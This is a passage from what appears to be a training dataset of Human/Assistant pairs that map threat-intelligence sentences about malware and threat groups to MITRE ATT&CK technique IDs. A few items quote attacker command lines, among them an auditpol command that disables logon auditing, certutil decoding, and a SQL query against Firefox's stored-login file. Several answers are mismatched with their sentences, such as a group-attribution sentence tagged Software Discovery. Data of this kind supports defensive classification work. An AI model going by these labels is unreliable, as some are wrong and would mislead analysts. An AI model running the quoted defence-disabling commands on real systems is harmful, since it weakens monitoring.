MITRE ATT&CK framework.,Hi-Zor uses various XOR techniques to obfuscate its components.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY has used PowerShell scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used RDP to log in and move laterally in the target environment.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT can use HTTP/S for C2 using the Microsoft Graph API.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Melcoz can use MSI files with embedded VBScript for execution.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Often this location is the current working directory of the program.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Daserf can take screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QUADAGENT used the PowerShell filenames Office365DCOMCheck.ps1 and SystemDiskClean.ps1.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Using this information, they can decide to explore further or instruct the compromised computer to download additional malware### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WIRTE has obtained and used Empire for post-exploitation activities.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also attempts to issue the following SQL query on the “signons.sqlite” file: “SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins WHERE timePasswordChanged/1000 BETWEEN ? AND ?” 117 ftpUpload Uses FTPManager:uploadFile method and a supplied server name, username and password### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If this object is not found, the macro will exit without downloading additional payloads.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider has stored collected date in a .tmp file.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Night Dragon has used compromised VPN accounts to gain access to victim systems.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SQLRat has used PowerShell to create a Meterpreter session.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth obfuscates its JScript code, and has used an XOR-based algorithm to encrypt payloads twice with different keys.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has embedded a ""vmdetect.exe"" executable to identify virtual machines at the beginning of execution.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent has the ability to set persistence using the Task Scheduler.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic collects the OS version, hardware information, computer name, available system memory status, disk space information, and system and user language settings.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BONDUPDATER can use DNS and TXT records within its DNS tunneling protocol for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Given the regional file format used there is a chance that some security software suites may not handle them well, and this may have provided an evasion case for the attacker.The documents sent to the targets were titled ""Analysis of ""Northern New Year in 2017"" and used the official logo of the Korean Ministry of Unification### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GreyEnergy has a module to inject a PE binary into a remote process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This excellent whitepaper by William Ballenthin, Matt Graeber and Claudiu Teodorescu contains additional information on WMI offense, defense and forensics### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bankshot searches for files on the victim's machine.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kessel can create a reverse shell between the infected host and a specified system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kinsing has used Unix shell scripts to execute commands in the victim environment.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has used web shells to export mailbox data.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Threat Group-3390 tool can read and decrypt stored Registry values.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has also used a Kubernetes cluster to conduct distributed, large-scale password guessing attacks.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can use certutil for propagation on Windows hosts within intranets.### Assistant: T1570: Lateral Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POORAIM can enumerate processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used AdFind.exe to collect information about Active Directory groups and accounts.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Gamaredon Group file stealer can communicate over HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify components of the PAM system to create backdoors.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gathering this information may reveal opportunities for other forms of reconnaissance , Search Open Websites/Domains, or Phishing for Information, establishing operational resources or Compromise Infrastructure, and/or initial access .### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,We are also highly confident that BlackOasis was also responsible for another zero day exploit (CVE-2017-8759) discovered by FireEye in September 2017.  The FinSpy payload used in the current attacks (CVE-2017-11292) shares the same command and control (C2) server as the payload used with CVE-2017-8759 uncovered by FireEye### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also used certutil -decode to decode files on the victim’s machine when dropping UPPERCUT.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Windows Component Object Model is a component of the native Windows application programming interface that enables interaction between software objects, or executable code that implements one or more interfaces.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian can store copied files in a specific directory prior to exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing.### Assistant: T1613: Container and Resource Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Data is exchanged via HTTP POSTs.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook has used .PNG images within a zip file to build the executable.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can execute a payload on a remote host with PowerShell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hildegard has packed ELF files into other binaries.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can base64 encode and AES-128-CBC encrypt data prior to transmission.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dark Caracal's version of Bandook adds a registry key to HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly has compromised targets via strategic web compromise utilizing a custom exploit kit.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.### Assistant: T1537: Transfer Data to Cloud Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can Base64 encode system information sent to C2.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Upon execution, Metamorfo has unzipped itself after being downloaded to the system and has performed string decryption.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Backdoor.Oldrea samples use standard Base64 + bzip2, and some use standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Netwalker can terminate system processes and services, some of which relate to backup software.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has used RAdmin, a remote software tool used to remotely control workstations and ATMs.### Assistant: T1072: Software Deployment Tools" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns.### Assistant: T1597: Search Closed Sources" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also used PowerShell to perform Timestomping.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Winnti Group looked for a specific process running on infected servers.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ObliqueRAT can check for blocklisted usernames on infected endpoints.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad has encrypted a virtual file system and various files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many strings in JHUHUGIT are obfuscated with a XOR algorithm.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The authentication process is handled by mechanisms, such as the Local Security Authentication Server process and the Security Accounts Manager on Windows, pluggable authentication modules on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has also stored documents for exfiltration in a hidden folder on USB drives.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Modify System Image may include implanted code to the operating system for network devices to provide access for adversaries using a specific password.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used sc query on a victim to gather information about services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KONNI used PowerShell to download and execute a specific 64-bit version of the malware.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This will cause ConsoleHost_history.txt to stop receiving logs.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as: * Policies, procedures, and standards * Physical / logical network diagrams * System architecture diagrams * Technical system documentation * Testing / development credentials * Work / project schedules * Source code snippets * Links to network shares and other internal resources### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POORAIM can identify system information, including battery status.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the dwell time value for the active mode has been set, but the package has not been received, the dwell time value is incremented by the dwell time value for the active period### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor uses RC4 to encrypt the message body of HTTP content.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some data encoding systems may also result in data compression, such as gzip.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CookieMiner has loaded coinmining software onto systems to mine for Koto cryptocurrency.### Assistant: T1496: Resource Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conficker scans for other machines to infect.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By default, Word has a Normal.dotm template created that can be modified to include a malicious macro.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used Tor for C2.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT30 has used spearphishing emails with malicious DOC attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious Scheduled Task/Job by modifying GPO settings, in this case modifying <GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D collects processor information, memory information, computer name, hardware UUID, serial number, and operating system version.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Other malware can list a directory's contents.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to Command and Scripting Interpreter, the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,(Source: Dell SecureWorks) TG-3390 actors have also used the following publicly available tools: Windows Credential Editor (WCE) — obtains passwords from memory gsecdump — obtains passwords from memory winrar — compresses data for exfiltration nbtscan — scans NetBIOS name servers Tactics, techniques, and procedures Incident response engagements have given CTU researchers insight into the tactics TG-3390 employs during intrusions### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX has a module for enumerating TCP and UDP network connections and associated processes using the netstat command.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Syrian Electronic Army compromised email accounts at the Financial Times to steal additional account credentials.### Assistant: T1534: Internal Spearphishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mosquito's installer searches the Registry and system to see if specific antivirus tools are installed on the system.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the device and/or service is not secured, then it may be vulnerable to interception.### Assistant: T1111: Two-Factor Authentication Interception" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest creates a hidden file, copies the original target executable to the file, then executes the new hidden file to maintain the appearance of normal behavior.### Assistant: T1554: Compromise Client Software Binary" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crutch has used the WinRAR utility to compress and encrypt stolen files.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called “Rocket Kitten” (AKA Operation Saffron Rose, Ajax Security Team, Operation Woolen-Goldfish) as well as an older attack campaign called Newscasters### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Andariel has limited its watering hole attacks to specific IP address ranges.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework., Invoke-DCOM ### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel.### Assistant: T1011: Exfiltration Over Other Network Medium" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can store its configuration information in a randomly named subkey under HKCU\Software\Microsoft.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once the password (delivered in the body of the email) is entered, the users are presented with a document that will request users to enable the malicious macro, as shown in Figure 3### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,YAHOYAH decrypts downloaded files before execution.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST masqueraded its network traffic as the Orion Improvement Program protocol.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Control Panel items are registered executable or Control Panel files, the latter are actually renamed dynamic-link library files that export a CPlApplet function.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The organization managed to discover what scripts were hosted on the server before BE/SandWorm gang deleted them, and unfortunately couldn’t restore them after they were deleted### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries have been observed conducting network DoS attacks for political purposes and to support other malicious activities, including distraction, hacktivism, and extortion.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX/Shlayer uses the command sh -c tail -c +1381... to extract bytes at an offset from a specified file.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Micropsia obfuscates the configuration with a custom Base64 and XOR.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The 2.0 versions require a dropper to decipher and launch the AES encrypted QUASARRAT payload### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT has created a service when it is installed on the victim machine.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke can identify the MAC address on the target computer.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.### Assistant: T1195: Supply Chain Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury has encrypted C2 traffic using the client IP address, then encoded it as a hexadecimal string.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WINDSHIELD can gather the victim computer name.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A variant of ADVSTORESHELL encrypts some C2 with RSA.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, botnets are available for rent or purchase.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Session cookies can be used to bypasses some multi-factor authentication protocols.### Assistant: T1539: Steal Web Session Cookie" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This effectively routes SOGU malware traffic through the victim’s service provider, which likely indicates a foothold on the service provider’s network### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also downloads additional plugins.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has lured victims into executing malicious macros embedded within Microsoft Office documents.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may compromise social media accounts that can be used during targeting.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,down_new has the ability to download files to the compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee has batch files that modify the system service COMSysApp to load a malicious DLL.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Analysis of Daserf has shown that it regularly undergoes technical improvements to evade anti-virus detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The results may also be used to identify routes, redirectors, and proxy servers.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM used netstat -oan to obtain information about the victim network connections.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT has used encoded data within subdomains as AES ciphertext to communicate from the host to the C2.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This shortcut file points to the path of the previously written ‘Applet.cpl’ file### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel for Linux uses crontab for persistence if it does not have root privileges.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Microsoft Management Console, or MMC, is a signed Windows binary and is used in several ways in either its GUI or in a command prompt.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda hooks processes by leveraging its own IAT hooked functions.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hikit has the ability to create a remote shell and run given commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has used malware to gather credentials from Internet Explorer.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum uses AES to encrypt network traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBStealer drops itself onto removable media and relies on Autorun to execute the malicious file when a user opens the removable media on another system.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Deletes existing file### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT creates a .LNK file for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang performs account discovery using commands such as net localgroup administrators and net group ""REDACTED"" /domain on specific permissions groups.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rising Sun can detect network adapter and IP address information.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used Google Drive for C2.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kessel can RC4-encrypt credentials before sending to the C2.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can store its configuration in the Registry at HKCU\Software\ under frequently changing names including %USERNAME% and ToolTech-RM.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The public keys of each entity are exchanged before encrypted communications begin.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Domains The RoyalCli backdoor was attempting to communicate to the following domains: News.memozilla[.]org video.memozilla[.]org The BS2005 backdoor utilised the following domains for C2: Run.linodepower[.]com Singa.linodepower[.]com log.autocount[.]org RoyalDNS backdoor was seen communicating to the domain: andspurs[.]com Possible linked APT15 domains include: Micakiz.wikaba[.]org cavanic9[.]net ridingduck[.]com zipcodeterm[.]com dnsapp[.]info Published date:  10 March 2018 Written by:  Rob Smallridge### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse security support providers to execute DLLs when the system boots.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury has used a DGA to generate a domain name for C2.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has exfiltrated data to file sharing sites, including MEGA.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Melcoz has been packed with VMProtect and Themida.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used a custom tool for creating reverse shells.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A variant of Emissary appends junk data to the end of its DLL file to create a large file that may exceed the maximum size that anti-virus programs can scan.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats used various implants, including those built on .NET, on target machines.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elevated privileges are required to edit this file though.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can check for existing stratum cryptomining information in HKLM\Software\Microsoft\Windows\CurrentVersion\spreadCpuXmr – %stratum info%.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke can turn itself on or off at random intervals.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group malware can insert malicious macros into documents using a Microsoft.Office.Interop object.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many libraries exist that can archive data, including Python rarfile , libzip , and zlib .### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Service configurations can be modified using utilities such as sc.exe and Reg.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GALLIUM collected data from the victim's local system, including password hashes from the SAM hive in the Registry.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Winnti Group used stolen certificates to sign its malware.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Ritsol backdoor trojan used by Elderwood can download files onto a compromised host from a remote location.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK 